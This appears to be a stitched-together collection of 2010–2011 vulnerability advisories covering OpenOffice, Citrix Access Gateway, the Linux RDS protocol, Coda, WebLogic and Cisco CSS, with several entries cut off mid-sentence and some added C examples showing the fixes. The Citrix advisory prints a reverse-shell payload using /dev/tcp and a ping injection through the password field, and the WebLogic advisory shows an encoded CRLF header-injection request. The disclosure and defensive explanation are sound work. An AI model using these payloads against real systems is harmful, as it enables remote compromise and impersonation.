-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Advisory Name: OpenOffice.org Multiple Memory Corruption Vulnerabilities
  Release Date: 2011-01-26
   Application: Oracle OpenOffice.org
      Versions: 3.2 and earlier
      Severity: High
        Author: Dan Rosenberg drosenberg (at) vsecurity.com
 Vendor Status: Patch Released
CVE Candidates: CVE-2010-3451, CVE-2010-3452, CVE-2010-3453, CVE-2010-3454
     Reference: http://www.vsecurity.com/resources/advisory/20110126-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
From [1]:

  OpenOffice.org 3 is the leading open-source office software suite for word processing, spreadsheets, presentations, graphics, databases and more. It is available in many languages and works on all common computers. It stores all your data in an international open standard format and can also read and write files from other common office software packages. It can be downloaded and used completely free of charge for any purpose.

Vulnerability Overview
----------------------
On August 20th, VSR identified multiple memory corruption vulnerabilities in OpenOffice.org. By convincing a victim to open a maliciously crafted RTF or Word document, arbitrary code may be executed on the victim's machine.

Vulnerability Details
---------------------
CVE-2010-3451:

OpenOffice.org uses its own internal memory management system for parsing tables in RTF documents. Information about each table row is inserted, element by element, into an SwTableBoxes object. These objects contain a fixed amount of data, and when they have reached capacity, a resize() method is called to double the space previously allocated for cell contents. When this method is called, the new space will be allocated on top of recently freed memory containing file data without clearing this memory.

Because of a bug in the RTF parser, corrupt table data may cause the insertion of elements into an SwTableBoxes object to skip an index rather than remaining strictly sequential. When this occurs, the nA field, representing the number of data elements used in the object, will be out of sync with the index of the most recently inserted element, allowing exploitation of a use-after-free vulnerability.

To exploit this issue, corrupt RTF table data first causes the nA field to become out of sync with the index of the most recently inserted element in an SwTableBoxes object. Next, the resize() method is called when the object reaches capacity, resulting in its data being reallocated on top of attacker-controlled memory. Finally, during the parsing of an RTF_ROW token, the nA field is used to index into the SwTableBoxes cell data in an attempt to retrieve the most recently added object. Because this index is out of sync and the data was recently moved on top of previously used memory, this will result in retrieving an attacker-controlled object from the heap. Subsequent usage of this object may allow an attacker to control program flow and execute arbitrary code.

CVE-2010-3452:

Due to a signedness error in parsing the \pnseclvl RTF tag, which is used for multi-level lists, it is possible to trigger a use-after-free vulnerability. When this tag is followed by an unexpected character, its token value may be negative. The parser attempts to restrict this value to less than the MAXLEVEL constant, but since a signed comparison is used, a negative value will pass this check. This value is then used as an index to retrieve an SwNumFmt object from an array on the heap. By manipulating the heap, it is possible to cause the retrieval of an attacker-controlled object. Subsequent usage of this object may allow an attacker to control program flow and execute arbitrary code.

CVE-2010-3453:

When processing override level numbers in parsing list data for Word documents, a user-controlled value is used to index into a vector for an assignment without checking that this index is less than the size of the vector. As a result, an attacker-controlled object may be written to a location on the heap past the bounds of the vector, potentially allowing arbitrary code execution.

CVE-2010-3454:

When parsing Word documents, two signed short values are read directly from the document file to determine where to place NULL terminators after copying additional data in. Because these indexes are not checked in any way, an attacker may use this to write NULL bytes to two arbitrary locations in memory, potentially allowing arbitrary code execution.

Versions Affected
-----------------
Versions prior to OpenOffice.org 3.3 are affected.

Vendor Response
---------------
The following timeline details OpenOffice.org's response to the reported issues:

2010-08-20  Initial
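The three Word/RTF issues above share one root cause: an index taken from the file is compared (or not compared) against the wrong bound before it is used. The following is an added example written for this page, not OpenOffice.org code; the \pnseclvl parser is a hypothetical stand-in that reproduces only the property the advisory describes (an unexpected character after the tag yields a negative token value), and the MAXLEVEL value, the format table and the helper names are assumptions.

```c
/* Added example (not OpenOffice.org code): index checks behind the
 * CVE-2010-3452 signedness bug and the CVE-2010-3453/3454 missing bounds
 * checks, modelled in plain C. The \pnseclvl handling is a stand-in. */
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MAXLEVEL 9   /* assumed: list levels 0..8 */

/* Assumed format table standing in for the SwNumFmt array on the heap. */
static const char *const g_numfmts[MAXLEVEL] =
    { "1.", "a.", "i.", "1)", "a)", "i)", "(1)", "(a)", "(i)" };

/* Modelled token value for "\pnseclvlN": the digit after the tag name or,
 * when an unexpected character follows, (char - '0'), which is negative for
 * any byte below '0'. Tags other than \pnseclvl yield MAXLEVEL (ignored). */
static int pnseclvl_value(const char *tag)
{
    static const char name[] = "\\pnseclvl";
    size_t n = sizeof name - 1;
    if (strncmp(tag, name, n) != 0) return MAXLEVEL;
    const char *arg = tag + n;
    if (*arg >= '0' && *arg <= '9') return atoi(arg);
    return *arg - '0';                          /* e.g. '!' - '0' == -15 */
}

/* Vulnerable shape: a signed compare against MAXLEVEL accepts negatives. */
static int level_ok_vulnerable(int level) { return level < MAXLEVEL; }

/* Fixed shape: check both bounds (equivalently (unsigned)level < MAXLEVEL). */
static int level_ok_fixed(int level) { return level >= 0 && level < MAXLEVEL; }

/* The general rule for the Word parser cases as well: a file-supplied index
 * is usable only if it lies inside the container it indexes. */
static int index_in_bounds(long idx, size_t count)
{
    return idx >= 0 && (unsigned long)idx < count;
}

/* CVE-2010-3454 shape: two int16 offsets read from the file decide where
 * NUL terminators are written. 1 only if both writes stay inside buflen. */
static int terminator_offsets_ok(int16_t off1, int16_t off2, size_t buflen)
{
    return index_in_bounds(off1, buflen) && index_in_bounds(off2, buflen);
}

/* Table lookup that applies the fixed check before touching the array;
 * returns NULL instead of reading from a negative or oversized index. */
static const char *numfmt_lookup(int level)
{
    if (!level_ok_fixed(level) || !index_in_bounds(level, MAXLEVEL)) return NULL;
    return g_numfmts[level];
}

int main(void)
{
    int good = pnseclvl_value("\\pnseclvl3");
    int bad  = pnseclvl_value("\\pnseclvl!");
    printf("\\pnseclvl3 -> %3d  vulnerable-check:%d fixed-check:%d\n",
           good, level_ok_vulnerable(good), level_ok_fixed(good));
    printf("\\pnseclvl! -> %3d  vulnerable-check:%d fixed-check:%d\n",
           bad, level_ok_vulnerable(bad), level_ok_fixed(bad));
    printf("lookup(%d) = %s, lookup(%d) = %s\n", good, numfmt_lookup(good),
           bad, numfmt_lookup(bad) ? numfmt_lookup(bad) : "(rejected)");
    return 0;
}
```

The point of `index_in_bounds` taking a `long` is that the caller's signed value is compared as signed first and only then widened to unsigned; casting a negative `int` straight to `size_t` and comparing would also work, but hides the intent from the next reader of the code.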
VSR Advisories: Citrix Access Gateway Command Injection Vulnerability
VSR Security Advisory
http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Advisory Name: Citrix Access Gateway Command Injection Vulnerability
  Release Date: 2010-12-21
   Application: Citrix Access Gateway
      Versions: Access Gateway Enterprise Edition (up to 9.2-49.8)
                Access Gateway Standard Advanced Edition (prior to 5.0)
      Severity: High
        Author: George D. Gal ggal (at) vsecurity (dot) com
 Vendor Status: Updated Software Released, NT4 Authentication Removed [2]
 CVE Candidate: CVE-2010-4566
     Reference: http://www.vsecurity.com/resources/advisory/20101221-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
From [1]:

  Citrix(R) Access Gateway(TM) is a secure application access solution that provides administrators granular application-level control while empowering users with remote access from anywhere. It gives IT administrators a single point to manage access control and limit actions within sessions based on both user identity and the endpoint device, providing better application security, data protection, and compliance management.

Vulnerability Overview
----------------------
On August 2nd, VSR identified a vulnerability in the way Citrix Access Gateway handles user authentication credentials. Under certain configuration settings, user credentials are passed as arguments to a command line program in order to authenticate the user. The lack of input validation, combined with the way the external program is spawned (through a shell), allows command injection and arbitrary command execution on the Access Gateway.

Vulnerability Details
---------------------
The Citrix Access Gateway supports multiple authentication types. When the external legacy NTLM authentication module, ntlm_authenticator, is in use, the Access Gateway spawns the Samba 'samedit' command line utility to verify a user's identity and password.

By embedding shell metacharacters in the web authentication form it is possible to execute arbitrary commands on the Access Gateway. The following commands are executed by the ntlm_authenticator during this process:

  vpnadmin 10130 0.0 0.0 2104  976 ? S 15:02 0:00 sh -c /usr/local/samba/bin/samedit -c 'samuser username -a' -U username%password -p 139 -S xxx.xxx.xxx.xxx > /tmp/samedit-samuser-stdout.50474096 2> /dev/null
  vpnadmin 10131 0.0 0.1 3852 1528 ? S 15:02 0:00 /usr/local/samba/bin/samedit -c samuser username -a -U username% -p 139 -S xxx.xxx.xxx.xxx

By submitting a password value as shown below, it is possible to establish a reverse shell to a netcat listener:

  | bash -i >& /dev/tcp/HOST/PORT 0>&1

Using a simple ping command in the password field, an attacker could use a timing attack to verify the presence of the vulnerability:

  | ping -c 10 HOST

The ping command above will attempt to send 10 ICMP echo requests to the target host, resulting in a noticeable delay easily detected by vulnerability scanners.

Versions Affected
-----------------
Testing was performed against a Citrix Access Gateway 2000 version 4.5.7. According to the vendor, this vulnerability affects all versions of Access Gateway Enterprise Edition up to version 9.2-49.8, and all versions of the Access Gateway Standard and Advanced Editions prior to Access Gateway 5.0.

Vendor Response
---------------
The following timeline details the vendor's response to the reported issue:

2010-08-06  Citrix was provided a draft advisory.
2010-08-10  Citrix acknowledged receipt of draft advisory.
2010-08-16  VSR follow-up to determine confirmation of issue.
2010-08-16  Citrix confirmed issue.
2010-09-14  VSR follow-up to determine status of issue.
2010-09-29  VSR follow-up to determine status of issue.
2010-09-30  Citrix confirmed continued investigation of the issue.
2010-10-19  VSR follow-up to determine status of issue.
2010-10-26  Citrix verified issue only exists in NT4 authentication feature.
2010-12-01  VSR follow-up to determine status of issue.
2010-12-02  Citrix confirmed December 14th release of security bulletin.
2010-12-14  Citrix releases security bulletin.
2010-12-20  CVE assigned.
2010-12-21  VSR releases advisory.

The Citrix advisory may be obtained at:

  http://support.citrix.com/article/CTX127613

Recommendation
--------------
Citrix has indicated that this vulnerability only affects legacy NT4 authentication, which has been removed from the latest release of the device firmware.

Common Vulnerabilities and Exposures (CVE) Information
------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-4566 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes
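The process listing above shows the whole problem: the authenticator builds one string containing the user's password and hands it to `sh -c`. The following is an added example written for this page, not Citrix or Samba code. It rebuilds that command line the vulnerable way (a string for the shell) and the safe way (an argv for execve(), where each credential is one argument), and adds an allowlist check as defence in depth. Nothing is executed; the samedit path is the one from the listing above, while the helper names and the allowlist are assumptions.

```c
/* Added example (not Citrix or Samba code): how the samedit invocation above
 * becomes injectable, and the argv form that is not. Nothing is executed. */
#include <stdio.h>
#include <string.h>

#define SAMEDIT "/usr/local/samba/bin/samedit"

/* Vulnerable shape: credentials interpolated into the string handed to
 * sh -c (what system() and popen() do). Returns 0 if out is too small. */
static int build_shell_command(char *out, size_t outlen,
                               const char *user, const char *pass, const char *dc)
{
    int n = snprintf(out, outlen,
                     SAMEDIT " -c 'samuser %s -a' -U %s%%%s -p 139 -S %s",
                     user, user, pass, dc);
    return n > 0 && (size_t)n < outlen;
}

/* Safe shape: an argv for execve(). "samuser USER -a" and "USER%PASS" are
 * each exactly one argument, so a '|' in the password is just a byte. The
 * two composed arguments live in scratch. Returns argc, or -1 on overflow. */
static int build_argv(const char *argv[10], char *scratch, size_t scratch_len,
                      const char *user, const char *pass, const char *dc)
{
    int n = snprintf(scratch, scratch_len, "samuser %s -a", user);
    if (n < 0 || (size_t)n >= scratch_len) return -1;
    char *creds = scratch + n + 1;
    size_t left = scratch_len - (size_t)n - 1;
    n = snprintf(creds, left, "%s%%%s", user, pass);
    if (n < 0 || (size_t)n >= left) return -1;
    argv[0] = SAMEDIT; argv[1] = "-c"; argv[2] = scratch;
    argv[3] = "-U";    argv[4] = creds; argv[5] = "-p"; argv[6] = "139";
    argv[7] = "-S";    argv[8] = dc;    argv[9] = NULL;
    return 9;
}

/* Defence in depth (assumed policy): refuse credentials containing shell
 * metacharacters, whitespace or control bytes before they reach any command. */
static int credential_is_clean(const char *s)
{
    static const char meta[] = "|&;<>()$`\\\"' *?[]{}~#!";
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (c < 0x20 || c == 0x7f || strchr(meta, c)) return 0;
    }
    return 1;
}

/* Demo wrappers on static storage so each result can be inspected directly. */
static char g_cmd[512], g_scratch[512];
static const char *g_argv[10];

static const char *demo_shell_command(const char *u, const char *p, const char *dc)
{
    return build_shell_command(g_cmd, sizeof g_cmd, u, p, dc) ? g_cmd : NULL;
}
static int demo_argc(const char *u, const char *p, const char *dc)
{
    return build_argv(g_argv, g_scratch, sizeof g_scratch, u, p, dc);
}
static const char *demo_argv_cred(const char *u, const char *p, const char *dc)
{
    return demo_argc(u, p, dc) == 9 ? g_argv[4] : NULL;
}

int main(void)
{
    const char *pass = "| ping -c 10 HOST";   /* the timing probe from the advisory */
    printf("sh -c  : %s\n", demo_shell_command("alice", pass, "xxx.xxx.xxx.xxx"));
    printf("argv[4]: \"%s\"  (a single argument, argc=%d)\n",
           demo_argv_cred("alice", pass, "xxx.xxx.xxx.xxx"),
           demo_argc("alice", pass, "xxx.xxx.xxx.xxx"));
    printf("allowlist accepts it: %d\n", credential_is_clean(pass));
    return 0;
}
```

The argv form is the actual fix; the allowlist only narrows what a future bug can be fed. Note that the listing above also redirects samedit's output to a predictable path under /tmp, which is a separate class of problem that an argv-based spawn with an explicit file descriptor would remove as well.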
VSR Advisories: Linux RDS Protocol Local Privilege Escalation
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

VSR Security Advisory
http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Advisory Name: Linux RDS Protocol Local Privilege Escalation
  Release Date: 2010-10-19
   Application: Linux Kernel
      Versions: 2.6.30 - 2.6.36-rc8
      Severity: High
        Author: Dan Rosenberg drosenberg (at) vsecurity (dot) com
 Vendor Status: Patch Released [3]
 CVE Candidate: CVE-2010-3904
     Reference: http://www.vsecurity.com/resources/advisory/20101019-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
From [1]:

  Linux is a free Unix-type operating system originally created by Linus Torvalds with the assistance of developers around the world. Developed under the GNU General Public License, the source code for Linux is freely available to everyone.

From [2]:

  Reliable Datagram Sockets (RDS) provide in order, non-duplicating, highly available, low overhead, reliable delivery of datagrams between hundreds of thousands of non-connected endpoints.

Vulnerability Overview
----------------------
On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write arbitrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root.

Vulnerability Details
---------------------
On Linux, recvmsg() style socket calls are performed using iovec structs, which allow a user to specify a base address and size for a buffer used to receive socket data. Each packet family is responsible for defining functions that copy socket data, which is received by the kernel, back to user space to allow user programs to process and handle received network data.

When performing this copying of data to user space, the RDS protocol failed to verify that the base address of a user-provided iovec struct pointed to a valid userspace address before using the __copy_to_user_inatomic() function to copy the data. As a result, by providing a kernel address as an iovec base and issuing a recvmsg() style socket call, a local user could write arbitrary data into kernel memory. This can be leveraged to escalate privileges to root.

Proof-of-Concept Exploit
------------------------
VSR has developed a proof-of-concept exploit [4] to both demonstrate the severity of this issue and allow users and administrators to verify the existence of the vulnerability. The exploit leverages the ability to write into kernel memory to reset the kernel's security operations structure and gain root privileges. The exploit requires that kernel symbol resolution is available to unprivileged users, via /proc/kallsyms or similar, as is the case on most stock distributions. It has been tested on both 32-bit and 64-bit x86 platforms.

While this exploit has been reliable during testing, it is not advised to run kernel exploits on production systems, as there is a risk of causing system instability and crashing the affected machine.

Versions Affected
-----------------
This vulnerability affects unpatched versions of the Linux kernel, starting from 2.6.30, where the RDS protocol was first included. Installations are only vulnerable if the CONFIG_RDS kernel configuration option is set, and if there are no restrictions on unprivileged users loading packet family modules, as is the case on most stock distributions.

Vendor Response
---------------
The following timeline details Linux's response to the reported issue:

2010-10-13  Vulnerability reported to Linux security team
2010-10-13  Response, agreement on disclosure date
2010-10-19  Fix publicly committed [3]
2010-10-19  Coordinated disclosure

Recommendation
--------------
Users should either install updates provided by downstream distributions, or apply the committed patch [3] and recompile their kernel.

Common Vulnerabilities and Exposures (CVE) Information
------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-3904 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

Acknowledgements
----------------
Thanks to Andrew Morton, Linus Torvalds, Andy Grover, and Eugene Teo for their prompt responses and patch.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
References:
1. Linux kernel
   http://www.linux.org
2. Reliable Datagram Sockets
CVE-2010-3014: Coda Filesystem Kernel Memory Disclosure
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

VSR Security Advisory
http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Advisory Name: Coda Filesystem Kernel Memory Disclosure
  Release Date: 2010-08-16
   Application: Coda kernel module for NetBSD and FreeBSD
      Versions: All known versions
      Severity: Medium
        Author: Dan Rosenberg drosenberg (at) vsecurity (dot) com
 Vendor Status: Patch Released [2][3]
 CVE Candidate: CVE-2010-3014
     Reference: http://www.vsecurity.com/resources/advisory/20100816-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
From [1]:

  Coda is a distributed filesystem with its origin in AFS2. It has many features that are very desirable for network filesystems. Currently, Coda has several features not found elsewhere.

  1. disconnected operation for mobile computing
  2. is freely available under a liberal license
  3. high performance through client side persistent caching
  4. server replication
  5. security model for authentication, encryption and access control
  6. continued operation during partial network failures in server network
  7. network bandwidth adaptation
  8. good scalability
  9. well defined semantics of sharing, even in the presence of network failure

Vulnerability Overview
----------------------
On July 19th, VSR identified a vulnerability in the Coda filesystem kernel module, as implemented for FreeBSD and NetBSD. By sending a specially crafted ioctl request to a mounted Coda filesystem, an unprivileged local user could read large portions of kernel heap memory, leading to the disclosure of potentially sensitive information.

Product Background
------------------
Coda is implemented as a kernel filesystem module with userland components. System calls involving file I/O are passed to the Coda kernel module, which in turn passes the request to the userland Venus cache manager via a character device. Venus answers the request by checking its cache or requesting content from the Coda server. Coda implements most standard filesystem operations, including providing an ioctl interface.

Vulnerability Details
---------------------
Coda ioctls are passed through the Coda filesystem module before being sent to Venus. The arguments to a Coda ioctl are encapsulated in a PioctlData struct, which in turn contains a ViceIoctl struct. The ViceIoctl struct contains in_size and out_size fields, dictating the expected size of the input and output data corresponding to a particular ioctl request.

The in_size field is validated to prevent memory corruption via copying an unexpected amount of data from userspace into a kernel buffer. However, the out_size field was missing this validation. When copying the output data of an ioctl request back to userspace, the out_size field was used to determine the amount of data to copy, without restricting it to a maximum possible size. By specifying a large value for this field, the contents of the kernel heap beyond the data intended to be returned to the user would be copied into a userland buffer. An unprivileged user could exploit this to read large portions of the kernel heap, potentially disclosing sensitive information.

Versions Affected
-----------------
This vulnerability affects all known versions of the Coda filesystem module as included in FreeBSD and NetBSD. The Linux Coda module is not affected.

Vendor Response
---------------
The following timeline details FreeBSD's and NetBSD's response to the reported issue:

2010-07-19  Vulnerability reported to FreeBSD and NetBSD
2010-07-20  Fix committed by NetBSD [2]
2010-07-21  Response from FreeBSD
2010-07-21  FreeBSD and NetBSD provided a draft advisory
2010-08-05  Fix committed by FreeBSD [3]
2010-08-16  Coordinated disclosure

Recommendation
--------------
Coda users should apply the updates committed by NetBSD [2] and FreeBSD [3].

Common Vulnerabilities and Exposures (CVE) Information
------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-3014 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

Acknowledgements
----------------
Thanks to the FreeBSD and NetBSD security teams for their prompt responses.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
References:
1. Coda File System
   http://www.coda.cs.cmu.edu
2. Coda module in NetBSD CVS
   http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/coda/?only_with_tag=MAIN
3. FreeBSD SVN revision 210997
   http://svn.freebsd.org/viewvc/base?view=revision&revision=210997
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
This advisory is
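The RDS advisory above and this Coda advisory are the two halves of the same rule for a kernel copy-to-user path: the destination address must be checked (RDS skipped access_ok() by using __copy_to_user_inatomic()), and the length must be bounded by what the kernel actually produced (Coda let the userland out_size drive the copy). The following is an added example written for this page, not Linux, FreeBSD or NetBSD code: a user-space model that makes the two decisions without dereferencing anything. The TASK_SIZE and kernel address constants, the VC_MAXDATASIZE cap, the modelled heap contents and the function names are assumptions.

```c
/* Added example (not Linux, FreeBSD or NetBSD code): a user-space model of
 * the address check missing in RDS (CVE-2010-3904) and the length check
 * missing in Coda (CVE-2010-3014). No memory is written through any of the
 * modelled addresses. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define TASK_SIZE   0x0000800000000000ULL   /* assumed user/kernel boundary */
#define KERNEL_BASE 0xffffffff80000000ULL   /* assumed address inside the kernel */

/* access_ok() model: [base, base+len) must lie entirely below TASK_SIZE
 * and must not wrap around. */
static int user_range_ok(uint64_t base, size_t len)
{
    if (len > TASK_SIZE) return 0;
    return base <= TASK_SIZE - len;
}

/* RDS shape. __copy_to_user_inatomic() performs no range check, so the
 * vulnerable path (check_range == 0) writes wherever iov_base points; the
 * checked path returns 0 (the kernel's -EFAULT) for a kernel address. */
static int rds_write_allowed(uint64_t iov_base, size_t iov_len, int check_range)
{
    if (check_range && !user_range_ok(iov_base, iov_len)) return 0;
    return 1;
}

/* Coda shape. The reply to an ioctl sits at the front of a modelled heap
 * with an unrelated allocation right behind it. */
#define VC_MAXDATASIZE 8192    /* assumed cap, the kind applied to in_size */
#define REPLY_LEN 16
static const unsigned char kernel_heap[] =
    "help-reply-data!"               /* REPLY_LEN bytes the caller should get */
    "SESSION-TOKEN-0xDEADBEEF";      /* neighbouring allocation: must not leak */

/* Bytes that would be copied to the user buffer, or -1 if rejected.
 * check_size == 0 lets the userland out_size drive the copy (vulnerable);
 * check_size == 1 caps it and clamps it to the reply actually produced. */
static long coda_copy_out(uint32_t out_size, int check_size,
                          unsigned char *dst, size_t dst_len)
{
    size_t n = out_size;
    if (check_size) {
        if (n > VC_MAXDATASIZE) return -1;            /* EINVAL */
        if (n > REPLY_LEN) n = REPLY_LEN;
    }
    if (n > sizeof kernel_heap || n > dst_len) return -1;  /* model safety only */
    memcpy(dst, kernel_heap, n);
    return (long)n;
}

static long coda_demo_copied(uint32_t out_size, int check_size)
{
    unsigned char dst[64];
    return coda_copy_out(out_size, check_size, dst, sizeof dst);
}

/* 1 if the user buffer ends up holding the neighbouring allocation. */
static int coda_demo_leaks(uint32_t out_size, int check_size)
{
    unsigned char dst[64] = {0};
    long n = coda_copy_out(out_size, check_size, dst, sizeof dst);
    return n > REPLY_LEN && memcmp(dst + REPLY_LEN, "SESSION-TOKEN", 13) == 0;
}

int main(void)
{
    printf("RDS  iov_base=0x%llx unchecked:%d checked:%d\n",
           (unsigned long long)KERNEL_BASE,
           rds_write_allowed(KERNEL_BASE, 4096, 0),
           rds_write_allowed(KERNEL_BASE, 4096, 1));
    printf("Coda out_size=40 unchecked: %ld bytes, leaks:%d\n",
           coda_demo_copied(40, 0), coda_demo_leaks(40, 0));
    printf("Coda out_size=40 checked:   %ld bytes, leaks:%d\n",
           coda_demo_copied(40, 1), coda_demo_leaks(40, 1));
    return 0;
}
```

The clamp to REPLY_LEN is the part that matters for disclosure: a cap alone (VC_MAXDATASIZE) still lets a caller request more than the reply contains, and everything between the end of the reply and the cap is neighbouring heap.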
CVE-2010-2375: WebLogic Plugin HTTP Injection via Encoded URLs
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

VSR Security Advisory
http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Advisory Name: WebLogic Plugin HTTP Injection via Encoded URLs
  Release Date: 2010-07-13
   Application: WebLogic Plugin
      Versions: All known versions
      Severity: High
 Discovered by: Timothy D. Morgan tmorgan (at) vsecurity {dot} com
  Contributors: George D. Gal ggal {at} vsecurity (dot) com
 Vendor Status: Patch Released [4]
 CVE Candidate: CVE-2010-2375
     Reference: http://www.vsecurity.com/resources/advisory/20100713-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
The product is best described by Oracle marketing literature in:

  Oracle WebLogic Server Enterprise Edition offers enterprises the ability to consolidate their applications on a pool of shared servers for both high efficiency and superior performance. No other application server has the proven performance on industry benchmarks across the most varied chip types and operating systems. Sophisticated High Availability (HA) features built on clustered instances ensure uptime. Easy-to-use yet substantial management tools keep systems going without hassle or expense. By coalescing applications and services onto Oracle WebLogic Server, IT is in position to react swiftly to change and help the enterprise outperform the competition.
  -- [1]

And:

  Oracle WebLogic Server Web Server Plugins provide load balancing across WebLogic Server Clusters by acting as front-end proxies. While WebLogic Server Web Server Plugins 1.0 are bundled with WebLogic Server, these new WebLogic Server Web Server Plugins 1.1 are downloadable separately outside of WebLogic Server and deliver enhanced functionality and improved security.
  -- [2]

Vulnerability Overview
----------------------
Over the last several years, VSR analysts had observed unusual behavior in multiple WebLogic deployments when certain special characters were URL encoded and appended to URLs. In late April 2010, VSR began researching this in more depth and found that the issue could allow for HTTP header injection and HTTP request smuggling attacks.

Product Background
------------------
WebLogic application server is commonly deployed in a three-tier architecture where the application server resides behind a public-facing web server. Oracle provides proprietary web server plugin modules for multiple web server software packages on various platforms in order to allow these services to act as reverse proxies and, in some cases, load balancers for multiple middle-tier WebLogic application servers.

Vulnerability Details
---------------------
The vulnerability stems from the web server plugin's processing of URLs submitted by users. When a URL is received, it is URL decoded at some point, but is not re-encoded prior to inclusion in requests to the middle-tier WebLogic server. This allows special characters, such as new lines, to be injected into requests directed at application servers. For instance, if an attacker were to send the following simple request:

  GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
  Host: vulnerable.example.com
  Connection: close

the web server proxy module would instead send a request on to the application server which looks more like:

  GET /logo.gif HTTP/1.1
  X-hdr: x HTTP/1.1
  Host: vulnerable.example.com
  Connection: close

This behavior allows for a wide variety of attacks, including trusted header injection and HTTP request smuggling.

Attack Scenarios
----------------
In the simplest scenarios, an attacker could use this flaw to inject malicious versions of headers which are considered trusted. In certain situations, headers are added to requests by the web server proxy module which may be used to make decisions about authentication or access control. For instance, the WL-Proxy-Client-IP header is added to requests to indicate to the application server which IP address the client used. If the application server uses this to enforce IP-based access control restrictions, then clearly this injection vulnerability could be used to bypass this restriction.

Another example would be the injection of a WL-Proxy-Client-Cert header. This header is used in deployments where clients are provided SSL/TLS client certificates for authentication. Since web servers would typically terminate this encrypted communication, application servers need a way of identifying the user who was authenticated. The WL-Proxy-Client-Cert header is used to communicate this information between the web server plugin and application servers. By injecting a false version of this header, it would be possible to impersonate other users and perhaps avoid presenting a client certificate at all.

More complex attacks are also possible by
VSR Advisory: Multiple Cisco CSS / ACE Client Certificate and HTTP Header Manipulation Vulnerabilities
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Advisory Name: Multiple Cisco CSS / ACE Client Certificate and HTTP Header Manipulation Vulnerabilities
  Release Date: 2010-07-02
   Application: Cisco Content Services Switch (CSS) / ACE Products
      Versions: Cisco CSS 11500 - 08.20.1.01
                Cisco ACE 4710 - Version A3(2.5) [build 3.0(0)A3(2.5)]
                (Other versions may be affected)
      Severity: High (in specific configurations)
        Author: George D. Gal ggal (a) vsecurity . com
 Vendor Status: Cisco CSS vulnerability remains unpatched, workarounds available
                Cisco ACE workarounds available
 CVE Candidate: CVE-2010-1575 - Certificate Spoofing Flaw
                CVE-2010-1576 - HTTP Request Parsing Flaw
     Reference: http://www.vsecurity.com/resources/advisory/20100702-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
From [1]:

  The Cisco CSS 11500 Series Content Services Switch is a high-performance, high-availability modular architecture for Web infrastructures. As the premiere switch for the Cisco Web Network Services Software, the Cisco CSS 11500 Series helps businesses to build global Web networks optimized for content delivery and e-commerce. By activating HTTP headers, the CSS 11500 Series helps to ensure availability, optimize utilization, reduce latency, increase scalability, and enhance security for Websites, server farms, cache clusters, and firewall systems.

From [2]:

